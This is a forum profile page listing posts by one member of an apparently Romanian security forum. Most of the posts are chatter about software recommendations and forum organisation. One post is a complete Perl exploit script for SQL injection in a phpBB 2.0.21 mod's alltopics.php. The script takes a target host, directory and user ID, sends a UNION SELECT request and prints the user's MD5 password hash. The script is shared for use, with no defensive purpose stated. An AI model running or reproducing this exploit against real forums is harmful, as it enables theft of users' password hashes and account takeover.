Jump to content

Imperfect

Active Members
  • Posts

    82
  • Joined

  • Last visited

Everything posted by Imperfect

  1. Ca browser ar trebui sa folosesti Mozila Firefox . Ca antivirus va recomand Nod32 . Un firewall bun ar fi "COMODO Firewall" , cea mai tare alegere in materie de protectie firewall gratuita . Nu lasa programe neautorizate sa acceseze Internetul + te apara de Hackeri Il gasesti la adresa "COMODO FIREWALL"
  2. #!/usr/bin/perl print q{ ++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + phpBB 2.0.21 (alltopics.php) SQL Injection Exploit + + + + bd0rk || SOH-Crew + + + + Mod: [url="http://www.phpbbhacks.com/download/2821 wrote:[/b] http://www.phpbbhacks.com/download/2821[/url] + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++ }; use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = ; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; $dir = ; chop ($dir); print q{ => User ID => Number: => }; $user = ; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ; print " => Exploit in process...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } }
  3. http://rst.myforum.ro/profile.php?mode=register www.google.ro - Search : Romanian Security Team . Numaru 8 . Acum am inteles , am crezut ca nu ai ce face .
  4. Cum doresti . Categoria se numeste "Sugestii" , iar eu am spus o sugestie . :roll:
  5. Adminii sau cei care au mod in categoria "XSS (cross site scripting)" , ar trebui sa deschideti un topic pe gen: "Aici postati XSS-urile gasite de voi" ( ca exemplu ) , pentru a nu mai fi deschise atatea topicuri .
×
×
  • Create New...